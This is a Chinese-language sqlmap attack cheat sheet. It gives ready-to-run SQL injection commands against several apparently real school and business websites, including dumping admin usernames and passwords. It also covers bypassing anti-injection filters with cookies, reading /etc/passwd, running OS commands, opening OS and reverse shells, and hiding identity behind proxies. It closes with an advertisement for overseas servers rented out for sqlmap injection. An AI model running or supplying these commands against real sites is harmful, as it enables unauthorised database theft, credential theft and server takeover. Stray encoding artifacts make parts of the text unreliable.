檢查注入點(diǎn)
sqlmap.py -u "http://www.scshlx.com/TeachView.asp?id=21"
列數(shù)據(jù)庫(kù)信息
sqlmap -u? "http://www.scshlx.com/TeachView.asp?id=21" --dbs
指定庫(kù)名列出所有表 //最大搜索線程為10
sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables
指定庫(kù)名表名列出所有字段
sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33"? -T "雙引號(hào)下為指定表名admin" --columns
指定庫(kù)名表名字段名dump出指定字段的內(nèi)容
sqlmap -u "http://ooxx.com.tw/star_photo.php?artist_id=11" --dump -T "admin" -C "username,password"
查詢表名下所有字段
sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables --columns
Mysql注入(有多個(gè)庫(kù) 必須找到有管理員的數(shù)據(jù)庫(kù))
--is-dba? 當(dāng)前用戶權(quán)限
--dbs? 所有數(shù)據(jù)庫(kù)
--current-db? ?網(wǎng)站當(dāng)前數(shù)據(jù)庫(kù)
--users? 所有數(shù)據(jù)庫(kù)用戶
--current-user? ?當(dāng)前數(shù)據(jù)庫(kù)用戶
--tables-D"當(dāng)前數(shù)據(jù)庫(kù)名字"? 查表名、
-T"指定的表名"-D"當(dāng)前數(shù)據(jù)庫(kù)名字"--columns 查字段
Cookie注入(遇到防注入)
sqlmap.py -u "http://www.scshlx.com/TeachView.asp" --cookie"id=21"--level 2? ?
列表名等 在上方代碼后面加--tables等;??
?eg:sqlmap.py -u "http://www.hexuan.com/shownews.asp" --cookie "id=1749" --level 2 --dump -T "admin" -C "username"
有幾個(gè)參數(shù)可能會(huì)用到,直接加在最后面就可以了,更多詳細(xì)參數(shù)見官方文檔:
–cookie=COOKIE在需要登錄的地方,需要登錄后的cookie
–proxy=”http://127.0.0.1:8087″? ?使用HTTP代理隱藏自己的身份,比如使用goagent等
–sql-query=QUERY? 執(zhí)行一個(gè)sql語(yǔ)句,不一定支持
sqlmap -u “http://url/news?id=1″ --dbms “Mysql” –users # dbms 指定數(shù) 據(jù)庫(kù)類型
sqlmap -u “http://url/news?id=1″ -- users 列數(shù)據(jù)庫(kù)用戶
sqlmap -u “http://url/news?id=1″ -- dbs? ?列數(shù)據(jù)庫(kù)
sqlmap -u “http://url/news?id=1″ -- passwords 數(shù)據(jù)庫(kù)用戶密碼
sqlmap -u “http://url/news?id=1″ -- passwords-U root -v 0 #列出指定用戶 數(shù)據(jù)庫(kù)密碼
sqlmap? -u? “http://url/news?id=1″? ?-- dump? -C? “password,user,id”? -T “tablename”-D “db_name”
–start 1 –stop 20 #列出指定字段,列出20 條
sqlmap -u “http://url/news?id=1″ -- dump-all -v 0 #列出所有數(shù)據(jù)庫(kù)所有表
sqlmap -u “http://url/news?id=1″ -- privileges #查看權(quán)限
sqlmap -u “http://url/news?id=1″ -- privileges -U root #查看指定用戶權(quán)限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是數(shù)據(jù)庫(kù)管理員sqlmap -u “http://url/news?id=1″ –roles #枚舉數(shù)據(jù)庫(kù)用戶角色
sqlmap -u “http://url/news?id=1″ -- udf-inject #導(dǎo)入用戶自定義函數(shù)(獲取 系統(tǒng)權(quán)限!)
sqlmap -u “http://url/news?id=1″ -- dump-all –exclude-sysdbs -v 0 #列 出當(dāng)前庫(kù)所有表
sqlmap -u “http://url/news?id=1″ -- union-cols #union 查詢表記錄
sqlmap -u “http://url/news?id=1″ -- cookie “COOKIE_VALUE”#cookie注入
sqlmap -u “http://url/news?id=1″ -- b #獲取banner信息
sqlmap -u “http://url/news?id=1″ -- data “id=3″#post注入
sqlmap -u “http://url/news?id=1″ - v 1 -f #指紋判別數(shù)據(jù)庫(kù)類型
sqlmap -u “http://url/news?id=1″ -- proxy“http://127.0.0.1:8118” #代理注 入
sqlmap -u “http://url/news?id=1″ -- string”STRING_ON_TRUE_PAGE”# 指 定關(guān)鍵詞
sqlmap -u “http://url/news?id=1″ -- sql-shell #執(zhí)行指定sql命令
sqlmap -u “http://url/news?id=1″ -- file /etc/passwd
sqlmap -u “http://url/news?id=1″ -- os-cmd=whoami #執(zhí)行系統(tǒng)命令
sqlmap -u “http://url/news?id=1″ -- os-shell #系統(tǒng)交互shell?
sqlmap -u “http://url/news?id=1″ –os-pwn #反彈shell
sqlmap -u “http://url/news?id=1″ -- reg-read #讀取win系統(tǒng)注冊(cè)表
sqlmap -u “http://url/news?id=1″ -- dbs-o “sqlmap.log”#保存進(jìn)度
sqlmap -u “http://url/news?id=1″ -- dbs -o “sqlmap.log” –resume #恢復(fù) 已保存進(jìn)度
USA-IDC海外服務(wù)器支持sqlmap post注入,歡迎廣大用戶聯(lián)系24小時(shí)在線客服租用